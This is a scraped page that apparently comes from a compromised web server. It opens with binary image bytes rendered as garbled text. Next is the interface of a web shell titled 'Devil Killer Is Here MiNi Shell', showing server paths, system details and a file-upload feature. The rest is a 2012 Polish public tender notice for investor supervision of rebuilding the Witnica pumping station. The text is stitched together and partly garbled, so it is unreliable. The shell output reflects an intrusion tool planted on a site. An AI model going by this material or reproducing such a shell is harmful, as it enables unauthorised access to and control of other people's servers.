JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120613/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120613/200052-N-2012.html

<p class="kh_header"><b>Gorzów Wielkopolski: Nadzór Inwestorski nad realizacją  zadania inwestycyjnego pn. Przepompownia WITNICA - odbudowa w gminie Witnica woj. lubuskie</b><br>
<b>Numer ogłoszenia: 200052 - 2012; data zamieszczenia: 13.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lubuski Zarząd Melioracji i Urządzeń Wodnych w Zielonej Górze Oddział w Gorzowie Wielkopolskim , ul. Myśliborska 52, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 95 7285931, faks 95 7285931.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://melioracja.lubuskie.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nadzór Inwestorski nad realizacją  zadania inwestycyjnego pn. Przepompownia WITNICA - odbudowa w gminie Witnica woj. lubuskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa pełnienia obowiązków nadzoru inwestorskiego nad realizacją  zadania inwestycyjnego pn. Przepompownia WITNICA - odbudowa w gminie Witnica woj. lubuskie,  polegających na zarządzaniu całością zadań i czynności w celu realizacji przedmiotowej inwestycji. 
Pojęcie Nadzoru Inwestorskiego jest tożsame-równoważne z pojęciem Inżyniera Kontraktu.
Nadzór Inwestorski zobowiązany jest wykonać wszystkie czynności faktyczne i prawne należące do Zamawiającego związane z realizacją ww. zadania inwestycyjnego.
Nadzór Inwestorski zobowiązany jest realizować usługę w oparciu o obowiązujące przepisy   prawa polskiego, przy zachowaniu należytej staranności, zgodnie ze sztuką budowlaną i najlepszą praktyką zawodową.
Nadzór Inwestorski nie jest uprawniony do zaciągania zobowiązań finansowych 
w imieniu Zamawiającego ani dokonywania bez pisemnej zgody Zamawiającego zmian 
w zakresie i technologii robót.

Podstawowe obowiązki Nadzoru Inwestorskiego:
- Nadzór Inwestorski w ciągu 14 dni od dnia podpisania umowy o wykonanie niniejszego zamówienia  zapozna się z  dokumentacją techniczną oraz uzgodnieniami i decyzjami   niezbędnymi  do realizacji projektu oraz dokona weryfikacji przedmiarów, kosztorysu  inwestorskiego i STWOiRB dot. robót budowlanych przedmiotowej inwestycji a uwagi przedłoży zamawiającemu na piśmie,
- w ramach wynagrodzenia zapewni wielobranżowy nadzór inwestorski zgodnie z obowiązującym w tym zakresie prawem i rozliczenie finansowe inwestycji,  
-  kontrola jakości robót oraz materiałów, maszyn i urządzeń,  
-  w imieniu inwestora będzie kontaktował się z osobami sprawującymi nadzór autorski,
 - Nadzór Inwestorski wezwie i wyegzekwuje w imieniu Zamawiającego od projektanta poprawienie lub uzupełnienie dokumentacji w trakcie realizacji robót w przypadku ujawnienia wad tej dokumentacji,
- organizacja i koordynacja realizacji Projektu w zakresie wszystkich robót,
- dostosować godziny pracy do przyszłego wykonawcy robót budowlanych,
- będzie monitorował postępy w realizacji zadania zgodnie z dokumentacją techniczną, dokumentami przetargowymi na roboty budowlane oraz zatwierdzonymi harmonogramami, zidentyfikuje także potencjalne obszary problemów oraz podejmie odpowiednie środki zaradcze,
- sprawdzi czy osoby zatrudnione przez wykonawcę robót budowlanych posiadają kwalifikacje oraz uprawnienia do prowadzenia prac budowlanych,
-  sprawdzi czy wszystkie używane urządzenia i materiały posiadają świadectwa i certyfikaty
    wymagane prawem,
-  nadzoruje terminową realizację harmonogramów finansowego i rzeczowego całego Projektu 
   jak również kontroluje  przepływy finansowe zgodnie z harmonogramem robót,
- będzie kontrolował na bieżąco postęp wykonania robót (w stosunku do zatwierdzonych  
   harmonogramów), 
-  weryfikuje faktury wystawione przez Wykonawcę Robót w związku z realizacją umowy na 
   roboty budowlane, 
- jest zobowiązany do udzielania regularnych konsultacji i doradztwa technicznego 
   Zamawiającemu w zakresie przedmiotowego zadania inwest.,
- kontroluje i potwierdza, że Wykonawca Robót budowlanych dostarcza właściwe materiały i 
   urządzenia wyszczególnione w dokumentacji projektowej. 
- sprawdza jakość wykonywanych robót, a w szczególności zapobiega zastosowaniu 
   materiałów budowlanych i urządzeń wadliwych i nie dopuszczonych do obrotu i stosowania 
   ich na budowie,
-  jest zobowiązany do sprawdzania i odbioru robót budowlanych ulegających zakryciu lub 
   zanikających, a także uczestniczy w odbiorach częściowych i końcowym, 
- wydaje kierownikowi budowy lub kierownikowi robót polecenia potwierdzone wpisem do
dziennika budowy dotyczące: wykonania prób, wymagających odkrycia robót lub elementów
  zakrytych oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych, 
  dowodów dopuszczenia do obrotu i stosowania w budownictwie wyrobów budowlanych oraz 
  urządzeń technicznych,
- weryfikuje obmiary każdego elementu robót a przyjęta metodologia musi być zgodna z 
  Przedmiarami Robót i Specyfikacjami Technicznymi,
- jest odpowiedzialny za odbieranie od Wykonawcy Robót budowlanych rozliczeń łącznie z 
  dokumentami stanowiącymi ich podstawę, weryfikowanie tych rozliczeń oraz przedkładanie 
  do zatwierdzenia Zamawiającemu faktur częściowych i końcowych,
- jest odpowiedzialny za sprawdzanie pod względem formalnym, merytorycznym i    
  rachunkowym wszelkiego rodzaju kalkulacji, kosztorysów, faktur, a także innych 
  dokumentów przedkładanych przez uczestników procesu inwestycyjnego w trakcie 
  rozliczania części, bądź całości wykonanych robót,
-  ściśle współpracuje z Zamawiającym i z osobą wskazaną przez Zamawiającego i dostarcza 
   wszystkie niezbędne, żądane dokumenty dotyczące rozliczeń,
-  jest odpowiedzialny za przedkładanie Zamawiającemu wszystkich raportów, oświadczeń i 
   zapytań dostarczonych przez Wykonawcę Robót budowlanych,
- egzekwuje od Wykonawcy Robót budowlanych dokumentację powykonawczą, sprawdza ją i 
  zatwierdza w porozumieniu z Zamawiającym,
- zarządza całym procesem przekazania obiektów do użytkowania,
- wydaje Wykonawcy Robót budowlanych; Częściowe, Końcowe Protokoły Odbioru,
- uczestniczy w końcowym rozliczeniu zadania inwest. z uwzględnieniem rozliczenia i 
  przekazania środków trwałych,
- opiniuje proponowane przez Wykonawcę Robót budowlanych i podwykonawców 
  rozwiązania i przedkłada do zatwierdzenia Zamawiającemu. W przypadku opinii negatywnej  
  przedstawi Wykonawcy Robót pisemne uzasadnienie, 
- po uzgodnieniu z Zamawiającym, wykona wszystkie inne czynności, nie wymienione w 
  umowie, które zostaną uznane za niezbędne dla prawidłowej realizacji Robót,
- jest całkowicie odpowiedzialny za odpowiedni dobór zespołu inspektorów nadzoru. Podczas nieobecności któregokolwiek ze specjalistów, wynikającej z urlopu, przedłużającego się zwolnienia lekarskiego lub innego powodu, Nadzór Inwestorski zapewni czasowe zastępstwo specjalistów na cały czas nieobecności zatrudnionych fachowców by uniknąć zwłoki w realizacji robót budowlanych. 
PONADTO:
	Nadzór Inwestorski  będzie zgłaszał Zamawiającemu potrzeby występowania do odpowiednich organów, gdy będą zachodzić okoliczności uzasadniające taką czynność, o uzyskanie dokumentów, uzgodnień i pozwoleń wynikających z realizacji inwestycji, zgodnie z obowiązującymi aktami prawnymi.
       Jest zobowiązany do przekazywania do Zamawiającego albo podmiotom przez niego wskazanym, na każde wezwanie, informacji i wyjaśnień na temat realizacji zadania inwest, w tym także do przedkładania będących w jego posiadaniu oryginałów dokumentów lub ich poświadczonych kopii, w szczególności dokumentów rozliczeniowych, w terminach wskazanych przez Zamawiającego.
      Przeprowadzać będzie bieżącą analizę dotyczącą ponoszonych nakładów inwestycyjnych w porównaniu z wielkościami zawartymi w kosztorysie inwestorskim i kosztorysie ofertowym, na podstawie którego podpisano Umowę z Wykonawcą Robót.
     Uczestniczy w odbiorze inwestycji lub jej części określonej w umowie z  Wykonawcą Robót budowlanych, zgodnie z Ustawą Prawo budowlane.
     Przygotowuje rozliczenie zadania inwestycyjnego po odbiorze zadania od Wykonawcy Robót budowlanych, zarówno częściowego jak i końcowego
     Przygotowuje dokumentację niezbędną do dochodzenia, zabezpieczenia i egzekwowania od uczestników procesu inwestycyjnego wszelkiego rodzaju roszczeń związanych z zabezpieczeniem należytego wykonania umowy, rękojmi, kar umownych i odszkodowań pozostających w związku z niewykonaniem bądź nienależytym wykonaniem zawartych z nimi Umów, a także nadzorowanie ciągłości i aktualizacji wnoszonych przez Wykonawcę Robót zabezpieczeń należytego wykonania umów.
     Przygotowuje dokumentację do rozliczenia w ramach zawartej w niniejszym postępowaniu umowy na potrzeby sprawozdań dotacji otrzymanych z zewnątrz
     Wykonuje wszystkie czynności zgodnie z obowiązującymi aktualnie przepisami, a w szczególności zgodnie z ustawą Prawo budowlane i Prawem zamówień publicznych.
     Wszystkie decyzje mogące wpływać na zakres umowy na Roboty Budowlane, jej czas trwania lub cenę wymagają zgody Zamawiającego w formie pisemnej.

Ponadto Nadzór Inwestorski opracuje i przedstawi: 
a) raport z zakresu zrealizowanych prac, wykonywania zadań i obowiązków nałożonych w niniejszym dokumencie na Nadzór. Raport ten składany będzie co najmniej raz na 3 miesiące,
b) raport końcowy z całej swojej działalności  - do złożenia w terminie 1 miesiąca od momentu zakończenia Umowy na Roboty objęte zadaniem inwest.

 Obowiązki Nadzoru Inwestorskiego szczegółowo zostały określone we wzorze umowy będącym integralną częścią  SIWZ , stanowiącym załącznik nr 9 do SIWZ.
 
UWAGA!  Informacja na temat możliwości powierzenia przez wykonawcę wykonania części lub całości zamówienia podwykonawcom.
Jeżeli Nadzór Inwestorski planuje możliwość powierzenia części prac podwykonawcom to w ofercie należy wskazać zakres prac, które wykona podwykonawca. 

Nadzór Inwestorski udzieli Zamawiającemu rękojmi na wykonaną przez siebie usługę objętą niniejszym zamówieniem. Okres rękojmi ustala się na 36 miesięcy i liczony będzie od daty podpisania protokołu odbioru końcowego robót budowlanych. W ww. okresie Wykonawca zobowiązany będzie utrzymywać kontakt z Zamawiającym, a w szczególności uczestniczyć w przeglądach gwarancyjnych, które winny odbywać się raz w roku przez okres trwania gwarancji i rękojmi wyznaczonej dla wykonawcy robót budowlanych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wymagane wadium w wysokości 1500,-zł.   (słownie: jeden tysiąc pięćset złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania wiedzy i doświadczenia tzn. że w okresie ostatnich trzech lat przed dniem wszczęcia     postępowania o udzielenie zamówienia a jeśli okres prowadzenia działalności jest krótszy to w tym okresie: pełnili Nadzór Inwestorski  z zakresu robót obejmujących  budowę, przebudowę lub odbudowę minimum jednej przepompowni melioracyjnej o wydajności powyżej 2,0m3/s o wartości robót brutto nie mniej niż 3,5 mln zł. lub  dwóch obiektów z zakresu budownictwa wodnego a zsumowana  wartość robót brutto  nie mniejsza niż 7,0 mln zł.  (zgodnie z niżej wymienionymi kategoriami obiektów budowlanych:  
nr XXVII z wyłączeniem śluz wałowych, syfonów, wałów przeciwpowodziowych, kanałów, opasek i ostróg brzegowych oraz rowów melioracyjnych, 
nr XXX - z wyłączeniem obiektów służących do zrzutów ścieków, stacji strefowych, stacji uzdatniania wody oraz oczyszczalni ścieków, wg załącznika do ustawy Prawo Budowlane z dnia 7 lipca 1994r.)   
i załączyli dokumenty potwierdzające (np. referencje), że usługi te zostały wykonane należycie (wykaz zrealizowanych zamówień - zał. nr 3). 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek może być spełniony łącznie.Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach 
i oświadczeniach wymaganych w specyfikacji. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tzn. dysponować osobami posiadającymi uprawnienia budowlane do sprawowania samodzielnych funkcji zgodnie z ustawą z dnia 7 lipca1994r. Prawo budowlane (Dz. U. z 2010r. Nr 243, poz. 1623 z późn. zm.) o następujących kwalifikacjach i uprawnieniach (wykaz kadry oferenta  - wg. zał. nr 4 )

a) Kierownik zespołu koordynującego prace Nadzoru Inwestorskiego, posiadający wykształcenie budowlane, który musi wykazać, iż w przeciągu ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania, kierował co najmniej jednym Projektem dotyczącym budowy, przebudowy lub odbudowy jednej przepompowni melioracyjnej o wydajności powyżej 2,0m3/s lub dwóch obiektów z zakresu budownictwa wodnego   (jak w dziale V pkt.2), oraz posiadający doświadczenie w kierowaniu zespołem inspektorów nadzoru,

b) Inspektor nadzoru branży konstrukcyjno-budowlanej - musi posiadać  uprawnienia budowlane do sprawowania samodzielnych funkcji zgodnie z ustawą z dnia 7 lipca1994r. Prawo budowlane (Dz. U. z 2010r. Nr 243, poz. 1623 z późn. zm.) bez ograniczeń. 
Inspektor budowlany musi wykazać się, iż w przeciągu ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania, pełnił funkcję inspektora nadzoru w zakresie swoich uprawnień przynajmniej jednej inwestycji o wartości minimum 3,5 mln zł. brutto lub dwóch inwestycji (jak w dziale V pkt.2), o wartości 7,0 mln zł. brutto łącznie oraz który jest członkiem właściwej okręgowej izby inżynierów budownictwa,

c) Inspektor nadzoru branży hydrotechnicznej lub wodno-melioracyjnej - musi posiadać  uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie, obejmujące co najmniej kierowanie 	budową lub innymi robotami budowlanymi zgodnie z ustawą z dnia 7 lipca 1994 r Prawo 	budowlane (Dz. U. z 2010r. Nr 243, poz. 1623 z późn. zm) w specjalności konstrukcyjno-budowlanej bez ograniczeń lub uprawnienia w zakresie budowli hydrotechnicznych lub wodno-melioracyjne uzyskane na podstawie wcześniej obowiązujących przepisów. Inspektor  musi wykazać się, iż w przeciągu ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania, pełnił funkcję inspektora nadzoru w zakresie swoich uprawnień przynajmniej jednej inwestycji o wartości minimum 3,5 mln zł. brutto lub dwóch inwestycji (jak w dziale V pkt.2), o wartości 7,0 mln zł. brutto łącznie oraz który jest członkiem właściwej okręgowej izby inżynierów budownictwa,

d) Inspektor branży elektrycznej - musi posiadać uprawnienia do kierowania robotami elektrycznymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które uprawniają do pełnienia tych funkcji w przedmiotowym postępowaniu i być wpisany na listę członków właściwej izby samorządu zawodowego. Inspektor musi wykazać się, iż w przeciągu ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania, pełnił funkcję inspektora nadzoru w zakresie swoich uprawnień przynajmniej jednej inwestycji o wartości  minimum 500 tys. zł.  brutto lub dwóch inwestycji o wartości powyżej 1,0 mln.zł. brutto łącznie.

e) Inspektor branży sanitarnej - musi posiadać uprawnienia do kierowania robotami sanitarnymi w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które uprawniają do pełnienia tych funkcji w przedmiotowym postępowaniu i być wpisany na listę członków właściwej izby samorządu zawodowego. Inspektor  musi wykazać się, iż w przeciągu ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania, pełnił funkcję inspektora nadzoru w zakresie swoich uprawnień przynajmniej jednej inwestycji o wartości  minimum 500 tys. zł.  brutto lub dwóch inwestycji o wartości powyżej 1,0 mln zł. brutto łącznie.

 W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek może być spełniony łącznie.Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach 
i oświadczeniach wymaganych w specyfikacji. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tj. posiadają opłaconą polisę , a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie mniejszą niż 300.000,-zł.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek może być spełniony łącznie.Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach 
i oświadczeniach wymaganych w specyfikacji. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-wykaz części zamówienia, które Wykonawca powierzy podwykonawcy , 
-upoważnienie dla osoby reprezentującej Wykonawcę, o ile to nie wynika z innych 
  dokumentów. W przypadku zawiązania konsorcjum, należy załączyć pełnomocnictwo dla  
   podmiotu reprezentującego kilku wykonawców, - pisemne zobowiązanie do współpracy osób lub podmiotów</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany postanowień umowy wymagają formy pisemnej w postaci aneksu podpisanego przez obie strony pod rygorem nieważności.
2. Dopuszcza się możliwość zmiany wynagrodzenia w przypadku wydłużenia terminu 
    realizacji robót budowlanych (wyznaczony dla Wykonawcy Robót budowlanych) o okres 
    dłuższy niż 3 m-ce. W tym przypadku będzie przysługiwał wzrost wynagrodzenia dla 
    Nadzoru Inwestorskiego liczony za cały okres wydłużenia wykonywania usługi (odpowiednio w tej samej cenie za 1 miesiąc). Miesięczny wzrost wynagrodzenia należy obliczyć jako iloczyn tego okresu i wartości otrzymanej z podzielenia umownego wynagrodzenia na okres wynikający z terminu wykonania przedmiotu umowy, który został określony w  § 3 ust.1.
    Wydłużenie terminu realizacji robót budowlanych (wyznaczony dla Wykonawcy Robót budowlanych) o okres krótszy niż 3 m-ce nie stanowi podstawy do renegocjacji wysokości wynagrodzenia. 
3. Dopuszcza się możliwość zmiany terminu realizacji przedmiotu umowy w przypadku  
    zmiany, zwłoki lub opóźnienia w terminie realizacji robót budowlanych  o okres dłuższy niż 
    3 miesiące.
4. Zamawiający dopuszcza zmianę osób odpowiedzialnych za wykonanie przedmiotu umowy
